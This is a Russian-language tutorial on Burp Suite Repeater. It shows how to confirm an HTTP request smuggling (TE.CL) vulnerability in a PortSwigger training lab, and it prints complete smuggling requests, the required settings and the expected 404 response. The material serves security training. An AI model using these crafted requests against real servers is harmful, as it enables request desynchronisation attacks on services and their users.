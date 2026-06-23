Содержание статьи
warning
Статья имеет ознакомительный характер и предназначена для специалистов по безопасности, проводящих тестирование в рамках контракта. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.
Итак, открывай Repeater и погнали!
Запрос в Repeater можно редактировать как угодно, но обрати внимание на шестеренку рядом с кнопкой отправки. В настройках ты задаешь поведение движка, который создает соединение и шлет данные на сервер. Эти опции способны испортить атаку, хотя кажутся абсолютно бесполезными.
Если пытаешься провести атаку HTTP request smuggling типа TE.CL, смысл операции в том, чтобы спрятать один запрос в теле другого. Пример атакующего запроса:
POST / HTTP/1.1Host: YOUR-LAB-ID.web-security-academy.netContent-Type: application/x-www-form-urlencodedContent-length: 4Transfer-Encoding: chunked5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
Прокси‑сервер, на который придет запрос, ориентируется на заголовок
Transfer-Encoding (TE) и полностью игнорирует
Content-Length. Для него запрос разбит на чанки (
chunked). Первый чанк имеет длину
5e, то есть:
POST /404 HTTP/1.1Content-Type: application/x-www-form-urlencodedContent-Length: 15x=1
Ноль показывает, что цепочка закончена. Тело запроса выглядит странно, но если нет WAF или правила, которое отбрасывает подобное тело, запрос пройдет.
Сервер‑жертва, который прячется за прокси и считает, что тот хорошо фильтрует запросы, наоборот, ориентируется на
CL, игнорируя
TE. Тебе важно, чтобы до конечного сервера запрос дошел с
Content-Length, равным 4. Тогда жертва порежет запрос на две части по размеру
Content-Length и обработает оба. Первый запрос:
POST / HTTP/1.1Host: YOUR-LAB-ID.web-security-academy.netContent-Type: application/x-www-form-urlencodedContent-length: 4Transfer-Encoding: chunked5e
PO
Второй:
POST /404 HTTP/1.1Content-Type: application/x-www-form-urlencodedContent-Length: 15x=1
Второй запрос останется подвешенным. Сервер ждет 15 байт, но получает только
x=1. В результате он ждет, когда придут остальные байты. Любой запрос, независимо от происхождения, закроет этот зависший POST, и пользователь увидит ошибку 404. Это еще не атака, но уже подтверждение, что уязвимость есть.
Для теста возьмем лабу HTTP request smuggling, confirming a TE.CL vulnerability via differential responses. Задача: подтвердить, что веб‑приложение уязвимо к контрабанде запросов типа TE.CL.
Запусти лабу и перехвати запрос к
/. Отправь его в Repeater, для ускорения можешь выделить запрос и нажать Ctrl-R. В настройках отключи Update Content-Length. И вообще все, что связано с запросами HTTP/2. Для многих атак с контрабандой запросов важно, чтобы версия HTTP была 1.1.
Если ты видишь, что версия запроса —
2, поменяй ее в Inspector справа. Разверни меню Request attributes и кликни по
HTTP/. Не меняй версию вручную, это может запутать движок.
info
Почти все параметры можно менять прямо в тексте, кроме версии HTTP и протокола. Чтобы переключиться с HTTPS на HTTP и обратно, как и поменять порт, кликай на карандаш над «Инспектором» в правой части экрана.
Приведи запрос к такому виду:
POST / HTTP/1.1Host: 0adc000d041272e5801cd500005e0046.web-security-academy.netContent-Type: application/x-www-form-urlencodedContent-Length: 4Transfer-Encoding: chunked5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
В конце не забудь два раза нажать Enter, чтобы правильно завершить запрос. Жми Send или используй сочетание клавиш Ctrl-Space. Отправь запрос дважды. Если уязвимость есть, вторая отправка завершит зависший POST-запрос к
/, и в ответе вернется:
HTTP/1.1 404 Not FoundContent-Type: application/json; charset=utf-8Set-Cookie: session=AhEwk0c4m2yNN8drBPhSCRzNQzpmcBi8; Secure; HttpOnly; SameSite=NoneX-Frame-Options: SAMEORIGINConnection: closeContent-Length: 11"Not Found"
Если не получилось, включи отображение спецсимволов (значок
\ над текстом запроса). В конце должно быть:
0\r \n
\r \n
Отправка группы запросов
Группировка запросов в Repeater — это не только удобная и понятная организация, но и возможность параллельно отправить тонну запросов. Массовая отправка нужна для многих атак вроде HTTP request smuggling и race condition. Эти атаки позволяют сломать логику приложения и получить доступ к закрытым разделам или доставить вредоносный код.
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